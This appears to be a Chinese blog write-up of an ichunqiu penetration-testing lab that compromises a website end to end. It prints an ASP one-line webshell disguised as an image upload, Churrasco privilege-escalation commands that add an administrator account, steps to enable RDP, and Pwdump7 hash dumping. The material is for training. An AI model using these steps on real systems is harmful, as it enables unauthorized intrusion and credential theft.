分类
CTF

ichunqiu-渗透测试入门05-网站综合渗透实验

 ## 网站综合渗透实验
 
 ### 工具
 - 御剑(后台扫描)
 - Domain(SQL注入)
 - 亦思想社会工程学字典生成器
 - MD5Crack2.exe
 - 中国菜刀(webshell)
 - cmd.exe + 巴西烤肉(Churrasco.exe) + 3389.bat (提权)
 - Pwdump7.exe(Hash获取)
 
 ### 背景
 - 社工破解登陆密码
 
 ### 步骤
 1. 社工搜索获取信息
     获取用户名、邮件、QQ、出生日期、
 2. 御剑扫描后台
 3. Domain扫描注入
     - 获得用户名和md5形式的密码
 4. 使用亦思想社会工程学字典生成器生成字典p.txt
 5. 使用MD5Crack2.exe + md5(密码) + p.txt字典,破解得到明文密码
 6. 进入后台,挂马
     1. 新建`m.txt`文本,写入一句话木马`<%Eval Request("pwd")%>`,在文本文件中(一句话木马后)填充文本,使其达到几十Kb即可;太小和太大都不行。
     2. 将`m.txt`重命名为`m.jpg`;上传为 网站顶部图标;上传成功后**生成代码**;记住该链接**`/admin/upfiles/xx.jpg`**
     3. 修改**数据库路径**为 **`/admin/upfiles/xx.jpg`**;把**备份的数据库路径** 修改为 **`/admin/upfiles/a.asp`**;点击**备份**。
 7. 菜刀连接
     `http://www.xxx.com/admin/upfiles/a.asp`
     密码为**pwd**
 8. 进入可写目录,上传提权工具
     1. 上传Churrasco.exe,3389,cmd到`C:\RECYCLER\`
         >
         > Churrasco.exe 中文名:巴西烤肉!
         > 
         > Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
         > 
         > 补丁名:KB956572  MS09-012
         > 
         > 使用方法:
          > 
          >     Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"
     2. 在菜刀中,以虚拟终端方式打开**cmd.exe**
     3. 添加用户提升权限:切换到上传文件的目录,`Churrasco "net user hacker 123 /add"`添加账户;`Churrasco "net localgroup administrators hacker /add"`给账户提权
     4. 开启3389:`Churrasco 3389`
 9. 进入远程服务器,获取管理员的Hash
     1. 在菜刀中上传Hash获取工具**Pwdump7.exe** + **libeay32.dll**
     2. 在远程服务器中打开 cmd.exe;进入`C:\RECYCLER\`目录
     3. 执行 `Pwdump7 > hash.txt`
     4. 查看hash.txt即可获取管理的hash
     5. 打开相关的hash破解网站,破解hash。例如`http://www.objectif-securite.ch/en/ophcrack.php`
 10. 在远程服务器中获取网站数据库的密码
     1. 找到网站目录,搜索数据库相关信息即可
     2. 注意细节 ldb文件一般和mdb文件放一起 

shuoed

山东鄄城人士,大学本科读了计算机科学与技术专业,研究生期间读了诉讼法学专业。
计算机领域,算法方面是算是ACM省银水平;编程方面在高校取得过项目比赛的奖励;网络方面考过了计算机等级四级网络工程师;安全方面考过了软考信息安全工程师;学术方面发表了一篇关于密码设置的论文,毕业论文写了X86架构下微内核的设计与实现。
法律领域,学术方面发表了三篇分别关于身份同一认定、不损坏原件原则、跨境取证的论文,写了一篇关于DDoS黑产的硕士论文(投稿中);取证方面参见了三类电子取证比赛,虎鲸杯、中科实数杯、美亚杯等共6次比赛,5次获奖。
目前就职于国内某知名电子取证公司做培训讲师。

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注